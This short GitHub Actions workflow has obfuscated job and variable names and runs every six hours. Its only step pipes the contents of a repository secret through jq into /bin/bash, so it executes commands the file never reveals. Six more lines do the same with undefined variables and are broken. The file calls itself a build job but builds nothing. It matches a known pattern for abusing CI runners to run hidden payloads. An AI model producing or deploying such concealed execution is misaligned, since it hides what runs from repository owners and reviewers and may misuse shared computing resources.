name: qinxunji4187

on:
  workflow_dispatch:
  schedule:
    - cron: '32 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qinxunji4187
        env:
          picqc3529: ${{ secrets.picqc3529 }}
        run: |
          echo $picqc3529 | jq -r .k6 | /bin/bash
          echo $jec2303 | jq -r .o5767 | /bin/bash
          echo $dffd385 | jq -r .kus2 | /bin/bash
          echo $druap415 | jq -r .du2 | /bin/bash
          echo $ouq145 | jq -r .cd928 | /bin/bash
          echo $r615 | jq -r .weo66746 | /bin/bash
          echo $lz07 | jq -r .xuha11113 | /bin/bash

